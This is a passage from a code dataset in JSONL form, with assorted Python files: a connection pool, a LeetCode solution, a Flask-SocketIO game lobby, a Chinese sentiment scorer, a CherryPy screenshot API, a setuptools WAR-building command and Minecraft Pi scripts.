(len(self.used_conns) < self.max_connections)\r\n \r\n def __len__(self):\r\n with self.lock:\r\n return len(self.idle_conns) + len(self.used_conns)\r\n \r\n def __repr__(self):\r\n return \"<%s object (idle=%d, used=%d) at %08x>\" % (type(self).__name__, len(self.idle_conns), len(self.used_conns), id(self))\r\n \r\n def get(self, timeout=WAIT_FOREVER):\r\n \"\"\"\r\n get a connection from pool\r\n \r\n @param wait timeout for available connection (0 = nowait, None = forever)\r\n @return connection or None\r\n \r\n \"\"\"\r\n while True:\r\n with self.lock:\r\n # try to get a connection from idle pool first \r\n conn = self.idle_conns.pop(0) if self.idle_conns else None\r\n \r\n if conn:\r\n # ensure the connection was connected or try to reconnect\r\n # if reconnect failed, drop the connection and try again\r\n \r\n try:\r\n if conn.connected:\r\n break\r\n \r\n if conn.reconnect(): \r\n break\r\n except AttributeError:\r\n # ignore the connection instance doesn't support connected or reconnect\r\n pass \r\n else:\r\n # if no idle connection and not to many used, try to create one \r\n if len(self.used_conns) < self.max_connections:\r\n conn = self.connection_creator()\r\n break \r\n \r\n # if too many used connections, return None for nowait \r\n if timeout == ConnectionPool.WAIT_NERVER:\r\n break\r\n \r\n # wait for idle connection, and try again without wait\r\n if self.idle_notify:\r\n if timeout:\r\n start_time = time.clock()\r\n \r\n self.idle_notify.wait(timeout) \r\n \r\n if timeout:\r\n timeout = timeout - (time.clock() - start_time)\r\n \r\n if timeout < 0:\r\n timeout = ConnectionPool.WAIT_NERVER\r\n \r\n continue\r\n else:\r\n break\r\n \r\n if conn:\r\n conn._pool = self \r\n \r\n # add connection to used pool for tracing\r\n with self.lock:\r\n self.used_conns[conn] = datetime.now()\r\n \r\n return conn\r\n \r\n def put(self, conn):\r\n with self.lock:\r\n if len(self.idle_conns) < self.min_connections:\r\n self.idle_conns.append(conn)\r\n \r\n if self.used_conns.has_key(conn):\r\n del self.used_conns[conn]\r\n \r\n if self.idle_notify:\r\n self.idle_notify.set()\r\n self.idle_notify.clear()\r\n ","sub_path":"urllib4/connpool.py","file_name":"connpool.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518141099","text":"#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 15:36:29 2018\n\n@author: owen\n\"\"\"\n\n# Let's call an array A a mountain if the following properties hold:\n\n# A.length >= 3\n# There exists some 0 < i < A.length - 1 such that A[0] < A[1] < ... A[i-1] < A[i] > A[i+1] > ... > A[A.length - 1]\n\n# Given an array that is definitely a mountain, return any i such that A[0] < A[1] < ... A[i-1] < A[i] > A[i+1] > ... > A[A.length - 1].\n\n#class Solution:\n# def peakIndexInMountainArray(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # time O(n), space O(1)\n# n=len(A)\n# for i in range(n-1):\n# if A[i]>A[i+1]:\n# return i\n \n#class Solution:\n# def peakIndexInMountainArray(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# return A.index(max(A))\n \n \nclass Solution:\n def peakIndexInMountainArray(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # Binary search, time O(log n), space O(1)\n lo,hi=0,len(A)-1\n while lo= 3 else False\n players = []\n\n for p in cursor:\n if 'ready' not in p:\n start_ready = False\n p['_id'] = str(p['_id'])\n p['game_id'] = str(p['game_id'])\n players.append(p)\n\n if start_ready:\n start_game(id, players, short_code)\n else:\n if players:\n emit('players', players, room=short_code)\n else:\n re_col('games').delete_one({\n '_id': id\n })\n\n\n@io.on('connect')\ndef connect():\n leave_game()\n username = session['username'] if 'username' in session else ''\n emit('load_HTML', render_template('set_user.pug', username=username))\n\n\n@io.on('disconnect')\ndef disconnect():\n leave_game()\n\n\n@io.on('set_user')\ndef new_user_socket(username):\n leave_game()\n if 'id' in session:\n player_id = session['id']\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'username': username}},\n upsert=True)\n else:\n player_id = re_col('players').insert_one(\n {'username': username}).inserted_id\n session['id'] = player_id\n\n session['username'] = username\n\n emit('player_id', str(player_id))\n emit('load_HTML', render_template('join_game.pug'))\n\n\n@io.on('load_join_game')\ndef load_join_game():\n leave_game()\n emit('load_HTML', render_template('join_game.pug'))\n\n\n@io.on('load_create_game')\ndef load_create_game():\n leave_game()\n short_code = ''.join(random.sample(ascii_lowercase, 4))\n emit('load_HTML', render_template('create_game.pug',\n short_code=short_code))\n\n\n@io.on('join_game')\ndef join_game(short_code):\n leave_game()\n game = re_col('games').find_one({'short_code': short_code})\n if not game:\n emit('join_error', 'Game does not exist')\n elif game['state'] != 0:\n emit('join_error', 'Game already started')\n else:\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'game_id': game['_id']}},\n upsert=True)\n join_room(short_code)\n session['game_id'] = game['_id']\n session['room'] = short_code\n emit('load_HTML', render_template(\n 'game_state_0.pug', short_code=short_code))\n emit_players(game['_id'], short_code)\n\n\n@io.on('ready')\ndef ready():\n re_col('players').update_one(\n {'_id': session['id']},\n {'$set': {'ready': True}},\n upsert=True)\n emit_players(session['game_id'], session['room'])\n\n\n@io.on('unready')\ndef unready():\n re_col('players').update_one(\n {'_id': session['id']},\n {'$unset': {'ready': ''}},\n upsert=True)\n emit_players(session['game_id'], session['room'])\n\n\n@io.on('create_game')\ndef create_game(short_code):\n leave_game()\n if re_col('games').find_one({'short_code': short_code}):\n emit('create_error', 'Short 
code already in use')\n elif re.findall('[^A-Za-z0-9]+', short_code):\n emit('create_error', 'Short code must be alphanumeric')\n else:\n re_col('games').insert_one({'short_code': short_code, 'state': 0})\n join_game(short_code)\n\n\n@app.route('/')\ndef start():\n return render_template('start.pug')\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"491888581","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 9 01:15:05 2017\n\n@author: juzheng\n\"\"\"\n\nimport jieba\nfrom collections import defaultdict\nfrom DICT import Nolist, Degreedict, NLPdict\nimport os\nimport matplotlib.pyplot as plt\n\nfilelist = os.listdir('C:\\\\Users\\\\juzheng\\\\Desktop\\\\pinglun')\ndef fileopen(filename):\n with open(filename, 'r') as fp:\n chap = fp.read()\n with open('C:\\\\Users\\\\juzheng\\\\Desktop\\\\tyc.txt', 'r') as fp:\n stopwords = fp.readlines()\n stopwordlist = []\n for word in stopwords:\n stopwordlist.append(word.strip())\n wordlist = []\n words = jieba.cut(chap, cut_all=False)\n for word in words:\n if word not in stopwordlist:\n if word != ' ':\n wordlist.append(word)\n print(wordlist)\n worddict = defaultdict()\n i = 0\n for word in wordlist:\n worddict[word] = i\n i = i + 1\n NLP = NLPdict.keys()\n degree = Degreedict.keys()\n senword = defaultdict()\n degreeword = defaultdict()\n noword = defaultdict()\n NLPl = []\n degreel = []\n nol = []\n p = 0\n for word in wordlist:\n if word == '。':\n p = p + 1\n if word in NLP:\n if word not in degree:\n if word not in Nolist:\n NLPl.append(word)\n senword[worddict[word]] = NLPdict[word]\n if word in degree:\n if word not in Nolist:\n degreel.append(word)\n degreeword[worddict[word]] = Degreedict[word]\n if word in Nolist:\n nol.append(word)\n noword[worddict[word]] = -1\n senloc = senword.keys()\n degreeloc = degreeword.keys()\n noloc = noword.keys()\n senloc = list(senloc)\n degreeloc = list(degreeloc)\n noloc = list(noloc)\n sennum = -1\n Sum = 0\n for i in range(len(wordlist)):\n d = 1\n score = 0\n if i in senloc:\n score = d * float(senword[i])\n sennum += 1\n if sennum < len(senloc) - 1:\n for j in range(senloc[sennum - 1], senloc[sennum]):\n if j in noloc:\n d *= -1\n elif j in degreeloc:\n score = score * d * float(degreeword[j])\n Sum += score\n ave = Sum / p\n return ave\nresult = []\nfor file in filelist:\n filename = 'C:\\\\Users\\\\juzheng\\\\Desktop\\\\pinglun\\\\' + file\n m = fileopen(filename)\n result.append(m)\nplt.figure()\nx = [1, 2, 3, 4, 5]\ny = result\nplt.scatter(x, y)\nplt.xticks([1, 2, 3, 4, 5])\nplt.ylabel('score')\nplt.savefig('C:\\\\Users\\\\juzheng\\\\Desktop\\\\score2.jpg')\nplt.show()\n","sub_path":"pingfen.py","file_name":"pingfen.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449126472","text":"import cherrypy # webserver framework\nimport tldextract\nimport json \nfrom cherrypy import _cperror\nimport os\nimport page_content #screenshot library\nimport time\nimport hashlib \nfrom tokens import get_tokens #list of valid tokens\nfrom PIL import Image #screenshot image file\nimport base64 # encode the output result\nimport sc_config\n\n# debug_level (False->production,True->development)\ndebug_level = False\n\ndef error_page_default(status, message, traceback, version):\n print(\"**********************\")\n print(cherrypy.request.headers)\n 
print('**********************')\n    # return \"maintenance,{}\".format(status)\n    try:\n        dbg_info = ''\n        global debug_level\n        if (debug_level):\n            dbg_info = \"{},{},{},{}\".format(status,message,traceback.replace(\"\\n\",\"<br>\"))\n            return \"FORBIDDEN AREA - NOT FOUND<br>
{}\".format(dbg_info)\n else:\n if status.startswith('404'):\n return not_found_html()\n #end if\n return \"VIVA :-)\"\n #end if\n except:\n return \"FORBIDDEN AREA / NOT FOUND AREA\"\n #end try\n#end def\n\ndef get_client_ip(headers):\n result = dict()\n result['remote_ip'] = None\n result['cf_user_ip'] = None\n result['client_ip'] = None\n result['visit_via_cf'] = False\n if headers == None or isinstance(headers,dict) == False:\n return result;\n #end if\n if headers.get('Remote-Addr',None) == None:\n return result\n #end if\n remote_ip = headers.get('Remote-Addr');\n result['remote_ip'] = remote_ip\n result['client_ip'] = remote_ip\n if headers.get(\"CF-Connecting-IP\",None) != None:\n cf_user_ip = headers.get(\"CF-Connecting-IP\")\n result['cf_user_ip'] = cf_user_ip\n result['client_ip'] = cf_user_ip\n #end if\n return result\n#end def\n\n\n\ndef not_found_html():\n return open('custom_page/404.html').read()\n# end def\n\n\ndef suspend_page():\n return open(\"custom_page/500.html\").read()\n#end def\n\n\nclass Screenshots(object):\n @cherrypy.expose\n def index(self,cat = None,username = None,password = None,submit = None,*args, **kwargs):\n print(\"**********************\")\n print(cherrypy.request.headers)\n print('**********************')\n ips = get_client_ip(cherrypy.request.headers)\n #cherrypy.response.status = 404\n #return cherrypy.request.headers[\"Remote-Addr\"]\n return open('index.html')\n #end if\n\n @cherrypy.expose\n def api(self,url=None,token=None,user_agent = None,proxy = None ,*args, **kwargs):\n\n print(\"**********************\")\n print(cherrypy.request.headers)\n print('**********************')\n # check if token is valid\n if not self.check_token_param(token):\n return json.dumps({\n 'success':False,\n 'code':403,\n 'msg':'Not authorized',\n 'attr':None}).encode('utf-8')\n # check validity of User-Agent\n user_agent = self.sanitize_user_agent(user_agent)\n # check validity of the URL\n if proxy != None:\n if not self.sanitize_proxy(proxy):\n return json.dumps({\n 'success':False,\n 'code':502,\n 'msg':'Wrong proxy format (Must be in a form of IP:PORT)',\n 'attr':None}).encode('utf-8') \n if not self.sanitize_url(url):\n return json.dumps({\n 'success':False,\n 'code':502,\n 'msg':'Wrong URL format (must start with http:// or https:// and no IP address)',\n 'attr':None}).encode('utf-8')\n # everything's fine...let's get screenshot\n return self.fetch_screenshot(url,user_agent,proxy).encode('utf-8')\n #end def\n\n def sanitize_url(self,url):\n \"\"\"\n Check if URL:\n 1. is string and -ne ''\n 2. starts with 'http' or 'https'\n 3. is not 'localhost' or '127.0.0.1'\n 4. 
len(url) < 1000\n \"\"\"\n result = [False]\n if not isinstance(url,str) or url.strip() == '' or url == None:result.append(True)\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):result.append(True)\n if len(url)>1000:result.append(True)\n tldparser = tldextract.extract(url)\n if tldparser.domain == '127.0.0.1':result.append(True)\n if tldparser.domain == 'localhost':result.append(True)\n if tldparser.suffix == '':result.append(True) # we do not scan IP addresses\n if any(result):return False\n return True\n #end def\n def sanitize_proxy(self,prx):\n # check if the proxy has two parts (port:IP)\n if not isinstance(prx,str):return False\n if prx.find(\":\") == -1:return False\n if len(prx)>21:return False\n prx = prx.split(\":\")\n prx = [x.strip() for x in prx if x.strip() != '']\n if len(prx) != 2:return False\n port = None\n ip = None\n try:\n port = int(prx[1])\n if port > 65535:return False\n ip = prx[0]\n if ip.count('.')!= 3:return False\n valid_char = ['0','1','2','3','4','5','6','7','8','9','.']\n if not all([True if x in valid_char else False for x in ip]):return False\n ip = ip.split(\".\")\n ip = [int(x) for x in ip]\n if any([True if x > 255 else False for x in ip]):return False\n return True\n except:\n return False\n def fetch_screenshot(self,url,user_agent,proxy):\n try:\n har = False\n if sc_config.config.get(\"HAR\",1) == 1:har = True\n pc = page_content.page_content(user_agent)\n result = pc.selenium_get(url,return_content=False,return_handle=True,headless=True,return_title=False,proxy = proxy,return_har = har)\n if result != None and isinstance(result,dict) and result.get(\"handle\",None)!=None:\n handle = result.get('handle')\n #wait 6 seconds before taking screenshots\n #time.sleep(6)\n f_name = hashlib.md5(str(time.time()).encode()).hexdigest()\n result = handle.save_screenshot(f_name + '.png')\n html = handle.page_source\n title = handle.title\n har_log = []\n if har:\n try:\n for entry in handle.get_log('performance'):\n har_log.append(entry)\n except:\n pass\n destination = handle.current_url\n if result != False:\n im = Image.open(f_name + '.png')\n bg = Image.new(\"RGB\", im.size, (255,255,255))\n bg.paste(im,im)\n bg.save(f_name + '.jpg')\n try:\n os.remove(f_name + '.png')\n f = open(f_name + '.jpg','rb')\n data = f.read()\n f.close()\n os.remove(f_name + '.jpg')\n data = base64.encodebytes(data).decode()\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n \"shot\":{'success':True,'data':data},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n except Exception as e:\n print(e)\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n 'shot':{'success':False,'data':None},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n #end\n else:\n handle.quit()\n return json.dumps({'success':True,'code':200,'msg':'success','attr':{\n 'shot':{'success':False,'data':None},\n 'title':title,\n 'html':html,\n 'har':har_log,\n 'destination':destination}})\n else:\n return json.dumps({'success':False,'code':503,'msg':'Unknown error1','attr':None})\n except Exception as e:\n print(e)\n return json.dumps({'success':False,'code':503,'msg':'Unknown error','attr':None})\n #end except\n #end def\n\n\n def sanitize_user_agent(self,user_agent):\n \"\"\"\n Checks if user-agent:\n 1. is instance of string\n 2. 
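None and non-str inputs are mapped to '' (e.g. sanitize_user_agent(None) -> '')\n        3. 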
len(useragent) < 150\n \"\"\"\n if user_agent == None:return ''\n if isinstance(user_agent,str):\n if len(user_agent) > 150:\n return user_agent[:150]\n else:\n return user_agent\n #end if\n else:\n return ''\n #end def\n \n def check_token_param(self,token):\n \"\"\"\n Checks if token:\n 1. is istring (and not None)\n 2. is not empty\n 3. len(token) == 64\n 4. exists in authorized token list\n \"\"\"\n if not isinstance(token,str) or token == '' or len(token) != 64 :return False\n tokens = get_tokens()\n if not isinstance(tokens,list):return False\n if token not in tokens:return False\n return True\n #end def\n#end class\n\n\nif __name__ == '__main__':\n # Run the server with the following configuration\n cherrypy.config.update({'server.socket_host': '0.0.0.0',\n 'server.socket_port': 8086,\n 'error_page.default': error_page_default\n })\n conf = {\n '/': {\n 'tools.encode.on': True,\n 'tools.encode.encoding': 'utf-8',\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [\n ('Server', 'nginx'),\n ('X-XSS-Protection','1; mode=block')\n ],\n 'tools.sessions.on': True,\n 'tools.sessions.name' : \"PHPSESSID\",\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n '/api':{\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type','application/json')]\n },\n '/assets': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': os.path.abspath(os.getcwd()) + '/assets',\n 'tools.staticfile.root' : os.path.abspath(os.getcwd()) + \"/assets\"\n }\n }\n cherrypy.quickstart(Screenshots(),'',conf)\n","sub_path":"src/sc_api.py","file_name":"sc_api.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"609492903","text":"import apb.config as config\nimport titlecase\n\nclass Base:\n _max_similar_tracks = config.read('general', 'max_similar_tracks')\n _max_top_tracks = config.read('general', 'max_top_tracks')\n _max_top_tags = config.read('general', 'max_top_tags')\n\n def __init__(self, artist=None, track=None):\n if artist and track:\n self.artist = titlecase(artist)\n self.track = titlecase(track)\n self.full_track = (self.artist, self.track)\n self.full_track_read = f'{self.artist} - {self.track}'\n self.track_url = None\n self.track_id = None\n self.similar_track_list = []\n elif artist and not track:\n self.artist = titlecase(artist)\n self.artist_id = None\n self.similar_artist_list = []\n\n self.tag_list = []\n","sub_path":"apb/servicebase.py","file_name":"servicebase.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"126790007","text":"import itertools\n\ndef solution(clothes):\n answer = 0\n kinds = {}\n for cloth in clothes:\n if cloth[1] in kinds:\n kinds[cloth[1]] += 1\n else:\n kinds[cloth[1]] = 1\n values = kinds.values()\n for i in range(1, len(values) + 1):\n combinations = list(itertools.combinations(values, i))\n for combination in combinations:\n temp = 1\n for val in combination:\n temp *= val\n answer += temp\n return answer\n\n ","sub_path":"Hash/spy.py","file_name":"spy.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452464032","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: 
build/bdist.macosx-10.6-x86_64/egg/snakefight/command.py\n# Compiled at: 2011-05-18 20:43:47\n\"\"\"setuptools/distutils `bdist_war` command\"\"\"\nfrom __future__ import with_statement\nimport glob, os, shutil, sys, tempfile, zipfile\nfrom StringIO import StringIO\nfrom distutils import log\nfrom distutils.dir_util import mkpath, remove_tree\nfrom distutils.errors import DistutilsError, DistutilsOptionError\nfrom distutils.sysconfig import get_python_version\nfrom pkg_resources import working_set\nfrom setuptools import Command\nfrom snakefight.util import gen_paste_loadapp, gen_web_xml\nis_jython = sys.platform.startswith('java')\n\nclass bdist_war(Command):\n \"\"\"Create a WAR file from a Jython WSGI application\"\"\"\n description = __doc__\n user_options = [\n ('web-xml=', None, 'Path to the web.xml file'),\n ('war-prefix=', None, \"Prefix of the war file to build (defaults to distribution's egg name)\"),\n ('jython-home=', None, 'JYTHON_HOME (defaults to the current home when ran under jython)'),\n ('no-jython', None, \"Don't include the Jython distribution\"),\n ('include-jars=', None, 'List of jar files to include in WEB-INF/lib (space or comma-separated)'),\n ('paste-config=', None, 'paste.app_factory config file. Automatically generates a web.xml when specified'),\n ('paste-app-name=', None, 'paste.app_factory named application (defaults to main)')]\n boolean_options = [\n 'no-jython']\n\n def initialize_options(self):\n self.web_xml = None\n self.war_prefix = None\n self.jython_home = getattr(sys, 'real_prefix', sys.prefix) if is_jython else None\n self.no_jython = False\n self.include_jars = None\n self.paste_config = None\n self.paste_app_name = 'main'\n self.war = None\n return\n\n def finalize_options(self):\n if not self.no_jython and not is_jython and not self.jython_home:\n raise DistutilsOptionError(\"Not running under Jython and no 'jython-home' specified\")\n if not self.web_xml and not self.paste_config:\n raise DistutilsOptionError('No web.xml specified')\n self.ensure_string_list('include_jars')\n if self.include_jars:\n missing = [ jar for jar in self.include_jars if not os.path.exists(jar) ]\n if missing:\n raise DistutilsOptionError('include-java-libs do not exist: %s' % missing)\n self.egg_info = self.get_finalized_command('egg_info')\n self.dist_name = self.distribution.get_fullname()\n if is_jython:\n self.dist_name += '-py%s' % get_python_version()\n bdist = self.get_finalized_command('bdist')\n skel_dir = os.path.join(bdist.bdist_base, 'war')\n self.web_inf = os.path.join(skel_dir, 'WEB-INF' + os.sep)\n self.lib_python = os.path.join(self.web_inf, 'lib-python' + os.sep)\n if self.war_prefix is None:\n self.war_prefix = self.dist_name\n self.war_name = os.path.join(bdist.dist_dir, self.war_prefix + '.war')\n self.temp_war = os.path.join(skel_dir, os.path.basename(self.war_name))\n return\n\n def run(self):\n self.setup()\n try:\n self._run()\n finally:\n self.teardown()\n\n def _run(self):\n mkpath(os.path.dirname(self.web_inf), dry_run=self.dry_run)\n if not self.dry_run:\n self.war = zipfile.ZipFile(self.temp_war, 'w')\n if os.path.exists(self.lib_python):\n remove_tree(self.lib_python, dry_run=self.dry_run)\n mkpath(os.path.dirname(self.lib_python), dry_run=self.dry_run)\n self.add_eggs()\n self.add_jars()\n if not self.no_jython:\n self.add_jython()\n self.add_web_xml()\n mkpath(os.path.dirname(self.war_name), dry_run=self.dry_run)\n if not self.dry_run:\n self.war.close()\n shutil.move(self.temp_war, self.war_name)\n log.info('created %s' % 
self.war_name)\n\n def setup(self):\n sys.path.insert(0, self.egg_info.egg_base)\n working_set.add_entry(self.egg_info.egg_base)\n os.putenv('PYTHONPATH', os.path.abspath(self.lib_python))\n os.environ['PYTHONPATH'] = os.path.abspath(self.lib_python)\n log.set_verbosity(self.verbose)\n\n def teardown(self):\n os.unsetenv('PYTHONPATH')\n if 'PYTHONPATH' in os.environ:\n del os.environ['PYTHONPATH']\n if self.war:\n self.war.close()\n\n def write(self, arcpath, filename):\n arcname = os.path.join(arcpath, os.path.basename(filename))\n log.debug('adding %s' % arcname)\n if not self.dry_run:\n self.war.write(filename, arcname)\n\n def writestr(self, arcname, bytes):\n log.debug('adding %s' % arcname)\n if not self.dry_run:\n temp = tempfile.NamedTemporaryFile()\n temp.write(bytes)\n temp.flush()\n self.war.write(temp.name, arcname)\n\n def add_eggs(self):\n ei_kwargs = dict(args=['.', 'setuptools'], zip_ok=False, install_dir=self.lib_python, exclude_scripts=True, always_copy=True, local_snapshots_ok=True, sitepy_installed=True, verbose=0)\n self.reinitialize_command('easy_install', **ei_kwargs)\n log.info('running easy_install %s' % self.egg_info.egg_name)\n if self.verbose < 2:\n sys.stdout = sys.stderr = StringIO()\n try:\n if not self.dry_run:\n self.run_command('easy_install')\n finally:\n if self.verbose < 2:\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n log.info('adding eggs (to WEB-INF/lib-python)')\n self.write_libs(self.lib_python)\n\n def write_libs(self, path):\n path = os.path.normpath(path)\n for (root, dirs, files) in os.walk(path):\n for file in files:\n arcpath = os.path.join('WEB-INF/lib-python', root[len(path) + 1:], file)\n log.debug('adding %s' % arcpath)\n if not self.dry_run:\n self.war.write(os.path.join(root, file), arcpath)\n\n def add_jython(self):\n jython_complete = os.path.join(self.jython_home, 'jython.jar')\n jython = os.path.join(self.jython_home, 'jython-dev.jar')\n if os.path.exists(jython_complete):\n log.info('adding WEB-INF/lib/%s' % os.path.basename(jython_complete))\n self.write('WEB-INF/lib', jython_complete)\n self.write_libs(os.path.join(self.jython_home, 'Lib'))\n elif os.path.exists(jython):\n log.info('adding WEB-INF/lib/%s and its jars/libs' % os.path.basename(jython))\n self.write('WEB-INF/lib', jython)\n for path in glob.iglob(os.path.join(self.jython_home, 'javalib', '*.jar')):\n self.write('WEB-INF/lib', path)\n\n self.write_libs(os.path.join(self.jython_home, 'Lib'))\n else:\n raise DistutilsError('Could not find Jython distribution')\n\n def add_jars(self):\n if not self.include_jars:\n return\n log.info('adding jars (to WEB-INF/lib)')\n for jar in self.include_jars:\n self.write('WEB-INF/lib', jar)\n\n def add_web_xml(self):\n if not self.web_xml:\n app_import_name = self.add_paste_loadapp(self.paste_config, self.paste_app_name)\n log.info('generating deployment descriptor')\n web_xml = gen_web_xml(display_name=self.distribution.get_name(), description=self.distribution.get_description(), app_import_name=app_import_name)\n else:\n with open(self.web_xml) as (fp):\n web_xml = fp.read()\n filename = 'WEB-INF/web.xml'\n log.info('adding deployment descriptor (%s)' % filename)\n self.writestr(filename, web_xml)\n\n def add_paste_loadapp(self, config, app_name):\n log.info('adding Paste ini file (to %s)' % os.path.basename(config))\n self.write('WEB-INF', self.paste_config)\n filename = 'WEB-INF/lib-python/____loadapp.py'\n log.info('adding Paste app loader (to %s)' % filename)\n self.writestr(filename, gen_paste_loadapp(config, 
app_name))\n        return '____loadapp.loadapp()'","sub_path":"pycfiles/snakefight-0.5-py2.5/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"364806893","text":"from numpy import *\nimport matplotlib.pyplot as plt\n\n\ndef load_data_arr(file_name):\n    \"\"\"\n    加载西瓜3.0alpha 数据,密度、含糖量、好瓜坏瓜。\n    hsplit(data_arr, (a, b))按列切割(竖直切割)\n    0<= column <a,a<= column <b,column >=b,把数据分成三部分;\n    hsplit(data_arr, (a,)),把数据分成两部分。\n    :param file_name: 文件名\n    :return:\n    \"\"\"\n    data_set = []\n    with open(file_name, 'r') as fr:\n        for line in fr.readlines():\n            data_set.append(list(map(float, line.strip('\\n').split(' ')))) # map/reduce\n    data_arr = array(data_set)\n    label_arr = hsplit(data_arr, (2,))[-1][:, 0] # [:, 0] 将返回的二维数组转成一维数组\n    data_arr = hsplit(data_arr, (2,))[0] # 返回一个二维数组\n    return data_arr, label_arr\n\n\nif __name__ == '__main__':\n    data_arr, label_arr = load_data_arr('../data/data_set3.0alpha.txt')\n    print(data_arr)\n    print(label_arr)\n","sub_path":"chapter8_ensemble_learning/adaptive_boosting.py","file_name":"adaptive_boosting.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"641389697","text":"# app/forms.py\n\nfrom wtforms import Field, Form, StringField\nfrom wtforms.validators import DataRequired, Length, URL\nfrom wtforms.widgets import TextInput\n\nfrom .models import Tag\n\n\n\nclass TagListField(Field):\n    \"\"\"\n    Custom field for (comma-separated) tag lists.\n    Described here: http://wtforms.readthedocs.io/en/latest/fields.html#custom-fields\n    \"\"\"\n    \n    widget = TextInput()\n    \n    def _value(self):\n        if self.data:\n            nameList = Tag.TagsToNames(self.data)\n            return ', '.join(nameList)\n        else:\n            return ''\n    \n    def process_formdata(self, namesStr):\n        if namesStr:\n            namesList = [ tn.strip() for tn in namesStr[0].split(',') ]\n            namesList = list( set(namesList) ) # remove duplicates\n            self.data = Tag.NamesToTags(namesList) # also creates any new tags\n        else:\n            self.data = []\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"233475364","text":"from gui.view import View\nfrom game import Entity\n\nimport pyglet\nfrom pyglet.window import key\nfrom pytmx.util_pyglet import load_pyglet\nfrom util import pytmxutil\nimport pdb\n\n\nclass LevelView(View):\n    \"\"\"docstring for LevelView\"\"\"\n    def __init__(self, width, height, tiled_map):\n        super(LevelView, self).__init__(width, height)\n        self.tiled_map = tiled_map\n\n        self.batch = pyglet.graphics.Batch()\n        self.background = pyglet.graphics.OrderedGroup(0)\n        self.entitiesGroup = pyglet.graphics.OrderedGroup(1)\n        self.foreground = pyglet.graphics.OrderedGroup(2)\n        self.sprites = []\n        self.entities = []\n        self.loadTiles(\"background\", self.background)\n        self.loadTiles(\"foreground\", self.foreground)\n\n    def loadTiles(self, groupname, group):\n        tiles = self.tiled_map.get_layer_by_name(groupname)\n        for x, y, image in tiles:\n            if image != 0:\n                temp = pyglet.sprite.Sprite(self.tiled_map.images[image], batch=self.batch, group=group)\n                temp.x = x * 32\n                temp.y = pytmxutil.transformY(y, self.height, self.tiled_map.tileheight)\n                self.sprites.append(temp)\n\n    def draw(self):\n        
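# a single batched call here renders every sprite that loadTiles added to self.batch\n        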
self.batch.draw()\n","sub_path":"gui/levelview.py","file_name":"levelview.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389194814","text":"import mcpi.minecraft as minecraft\nimport mcpi.block as block\n\nmc = minecraft.Minecraft.create()\nmc.postToChat('Hello Minecraft!')\n\npos = mc.player.getTilePos()\nmc.postToChat('X=%d, Y=%d, Z=%d' % (pos.x, pos.y, pos.z))\nprint('X=%d, Y=%d, Z=%d' % (pos.x, pos.y, pos.z))\n\nmc.setBlock(pos.x+3, pos.y, pos.z, block.STONE.id)\n\nmc.setBlocks(pos.x+3, pos.y, pos.z, pos.x+10, pos.y+10, pos.z+10, block.STONE.id)\n\n","sub_path":"Unit 0 试听/08-建造多个方块.py","file_name":"08-建造多个方块.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34916435","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 10 17:20:55 2017\n\n@author: chojnaal\n\"\"\"\n\nimport time\nimport dart as d\nimport random\n#import vRazor\n\n#dart = d.Dart()\n\ncoef = 10\n\ndef setHeading(dart, head):\n headOk = False\n tolerance = 5\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n speed = 50\n while not headOk:\n headMes = dart.get_angles()\n# headMes = dart.get_angles() + 2 * coef * random.random() - coef\n# print(headMes)\n headErr = head - headMes\n \n if abs(headErr) < tolerance:\n headOk = True\n dart.motor(0,'left')\n dart.motor(0,'right')\n else:\n if (headErr > 0 and headErr < 180) or headErr < 